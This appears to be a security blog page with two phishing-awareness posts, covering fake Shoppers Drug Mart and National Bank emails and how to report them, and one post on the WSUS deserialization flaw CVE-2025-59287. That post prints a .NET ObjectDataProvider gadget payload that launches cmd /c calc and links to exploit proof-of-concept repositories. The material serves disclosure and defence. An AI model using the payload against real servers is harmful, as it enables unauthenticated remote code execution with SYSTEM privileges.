Sunday, November 9, 2025

Shoppers Drug Mart Phishing email with subject Shoppers Drug Mart Loyalty Program


For the record, this is general Shoppers Drug Mart phishing email attempt that is recently going around, with subject "Shoppers Drug Mart Loyalty Program" What to do?  Report them, go to bottom of page. 



From : Shoppers <maybell.idalinepw@sedfhgv.shopmys.best>
Subject : Shoppers Drug Mart Loyalty Program

identified this email as spam




PHISHING LINKs;

1. Hover over image
https://click.convertkit-mail2.com/xxxxx/xxx/xxx#xxxxx

How to tell this is a Phishing email ?


  1. Check email address in full, if it's not from originating company then it's phishing.
  2. Hover over all links in email, if it's not from the company's website then forget it.
  3. The best way is to view source message; end examine the source location and emails links are from the domain claimed.

How to examine Email Message Source ?

Now let's look at message source
  1. Outlook.com->Actions->View Message Source. 
  2. Gmail.com->More (down arrow to top right)->Show original.
Check for suspicious links, anything that does not originate from the domain.


Report Phishing Email (not as Spam)

  1. Outlook.com->Junk (at Top)->Phishing Scam
  2. Gmail.com->More (down-arrow to top right)->Report Phishing 

Report Phishing

If you have received this email, take further 

  1. https://www.google.com/safebrowsing/report_phish/

Report phishing at Microsoft and government agencies

  1. http://www.microsoft.com/security/online-privacy/phishing-faq.aspx

Posted by metadataconsulting (profile) at 7:00 AM 0 comments

Saturday, November 8, 2025

PoC code for Microsoft Windows Server Update Services (WSUS) attack CVE-2025-59287

CVE-2025-59287 is a critical RCE vulnerability in Microsoft Windows Server Update Services (WSUS), caused by unsafe deserialization of AuthorizationCookie data through BinaryFormatter in the EncryptionHelper.DecryptData() method. The vulnerability allows an unauthenticated attacker to achieve remote code execution with SYSTEM privileges by sending malicious encrypted cookies to the GetCookie() endpoint. Permanent mitigation requires replacing BinaryFormatter with secure serialization mechanisms, implementing strict type validation, and enforcing proper input sanitization on all cookie data.

PoC code below, excellent article

CVE-2025-59287 WSUS Unauthenticated RCE | HawkTrace

Poc Decode Payload running calc.exe

<Microsoft.PowerShell.Editor, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35 Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties.ForegroundBrush=Black><?xml version="1.0" encoding="utf-16"?>
<ObjectDataProvider MethodName="Start" IsInitialLoadEnabled="False" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:sd="clr-namespace:System.Diagnostics;assembly=System" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml">
  <ObjectDataProvider.ObjectInstance>
    <sd:Process>
      <sd:Process.StartInfo>
        <sd:ProcessStartInfo Arguments="/c calc" StandardErrorEncoding="{x:Null}" StandardOutputEncoding="{x:Null}" UserName="" Password="{x:Null}" Domain="" LoadUserProfile="False" FileName="cmd" />
      </sd:Process.StartInfo>
    </sd:Process>
  </ObjectDataProvider.ObjectInstance>
</ObjectDataProvider>


Other sources

PayloadsAllTheThings/Insecure Deserialization/DotNET.md at master · swisskyrepo/PayloadsAllTheThings (github.com)

dexterm300/cve-2025-59287-exploit-poc: Exploitation proof-of-concept for CVE-2025-59287 - a critical vulnerability in the Windows Server Update Service (WSUS) caused by the deserialization of untrusted data. This flaw allows an unauthorized attacker to execute arbitrary code over a network, posing a significant security risk. (github.com)

ObjectDataProvider verwendet (www-cnblogs-com.translate.goog)

dotnet-deserialization/XmlSerializer.md at main · Y4er/dotnet-deserialization (github.com)

.NET Deserialization Exploitation Chain: A Beginner's Guide - XmlSerializer - FreeBuf Network Security Portal (www-freebuf-com.translate.goog)


Posted by metadataconsulting (profile) at 12:00 AM 0 comments

Thursday, November 6, 2025

National Bank phishing email with subject Tax Residency Verification - Mandatory Renewal of Form


For the record, this is a National Bank phishing email attempt that is recently going around, with subject "Tax Residency Verification — Mandatory Renewal of Form"


What to do?  

Report them, goto bottom of page. 


From : helpdesk@griolk.com
Subject : Tax Residency Verification — Mandatory Renewal of Form




PHISHING LINKs;

1. https://nbdb-entryt.com/?token=xxxxxxxxxxxxxxxxxx

How to tell this is a Phishing email ?

  1. Check email address in full, if it's not from originating company then it's phishing.
  2. Hover over images and all links in email, if it's not from the company's website then forget it. 

How to examine Email Message Source?

Now let's look at message source
  1. Outlook.com->Actions->View Message Source. 
  2. Gmail.com->More (down arrow to top right)->Show original.
Check for suspicious links, anything that does not originate from the domain.


Report Phishing Email (not as Spam)

  1. Outlook.com->Junk (at Top)->Phishing Scam
  2. Gmail.com->More (down-arrow to top right)->Report Phishing 

Report Phishing

If you have received this email take further 

  1. https://www.google.com/safebrowsing/report_phish/


Report phishing at Microsoft and government agencies

  1. http://www.microsoft.com/security/online-privacy/phishing-faq.aspx

Posted by metadataconsulting (profile) at 7:00 AM 0 comments
Subscribe to: Comments (Atom)